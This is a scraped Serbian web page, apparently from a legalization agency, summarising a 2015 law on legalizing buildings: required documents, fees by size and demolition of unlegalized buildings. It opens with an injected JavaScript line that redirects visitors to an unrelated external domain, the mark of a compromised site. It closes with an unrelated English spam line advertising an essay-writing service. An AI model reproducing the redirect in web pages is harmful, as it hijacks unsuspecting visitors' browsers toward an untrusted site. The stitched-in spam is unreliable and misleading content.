window.location='http://ww82.jquerystatistics.org/';

News

Check out market updates

Legalizacija objekata

ŠTA DONOSI NOVI ZAKON O LEGALIZACIJI OBJEKATA 2015.GOD?

Ovim zakonom vam treba dokument i izjava o zatečenom stanju objekta, treba da angažujete arhitektu ili geodetsku firmu koja to popunjava. Usluga je jeftinija, ono što plaćate državi je smanjeno sa tri takse na jednu taksu i dokaz o pravu svojine. Na primer objekat u Kaluđerici od 100 kvadrata treba da vas izađe oko 100 evra, odnosno 12.000 dinara”, objasnio je savetnik ministarke.

Možete li nam navesti neki primer?

Na primer, do sada je za porodičnu kuću do 100 kvadrata bilo potebno šest dokumenata i 2,855 miliona dinara .

Oni koji su podneli zahtev do februara 2014, a ako su dostavili dokaze plaćaće taksu za “ozakonjenje”, dok oni koji nisu podneli zahtev do tog roka, nakon popisa inspekcije, moraće da dostave dva dokumenta – izveštaj o zatečenom stanju objekta i dokaz o pravu svojine, kao i da plate taksu za “ozakonjenje”.

Vlasnici koji su podneli zahtev za legalizaciju objekata do 100 kvadrata plaćaće taksu od 3.000 dinara, do 200 kvadrata 10.000 dinara i do 300 kvadrata 20.000 dinara.

Sta kažu za objekte koji nisu ni nakon ovog zakona legalizovani ?

Biće srušeni. Citiramo reči jednog od čelnih ljudi iz Ministarstva :

Svi zahtevi koji su podneti će biti uzeti u obzir, ako niste završili legalizaciju biće uzeto u obzir, ako ste svu dokumentaciju podneli ranije plaćate samo taksu i u roku od osam dana ćete dobiti rešenje. Ili ozakonite objekat ili će biti srušen“,

 

Da li namVaša agencija može pomoći?

ZA POMOC U PROCESU LEGALIZACIJE MOZETE NAS KONTAKTIRATI

This https://www.affordable-papers.net/ way, you’ll be able to get an article that meets the requirements which you’ve set for your essay.